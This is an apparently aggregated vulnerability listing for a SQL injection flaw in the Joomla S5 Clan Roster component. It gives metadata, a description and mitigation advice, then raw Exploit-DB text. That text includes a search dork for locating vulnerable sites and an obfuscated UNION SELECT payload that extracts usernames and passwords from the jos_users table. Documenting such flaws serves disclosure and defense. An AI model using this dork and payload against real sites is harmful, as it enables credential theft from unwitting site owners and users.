Joomla Component com_s5clanroster Sql Injection Vulnerability

vendor:

S5 Clan Roster

by:

AtT4CKxT3rR0r1ST

8,8

CVSS

HIGH

SQL Injection

CWE

Product Name: S5 Clan Roster

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

Joomla Component com_s5clanroster Sql Injection Vulnerability

A SQL injection vulnerability exists in the Joomla component com_s5clanroster. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable server. This request contains malicious SQL code that can be executed in the backend database. The malicious code can be used to extract sensitive information from the database, such as usernames and passwords.

Mitigation:

Developers should ensure that user-supplied input is properly sanitized and validated before being used in SQL queries. Additionally, developers should use parameterized queries to prevent SQL injection attacks.

Source

Exploit-DB raw data:

Joomla Component com_s5clanroster Sql Injection Vulnerability
==============================================================
 
####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Dork           : inurl:"com_s5clanroster"
.:. Script         : http://www.shape5.com/product_details/club_extensions/s5_clan_roster.html
####################################################################
===[ Exploit ]===

Sql Injection:
==============

server/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=1[sql]

server/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null'+/*!50000UnIoN*/+/*!50000SeLeCt*/group_concat(username,0x3a,password),222+from+jos_users-- -
####################################################################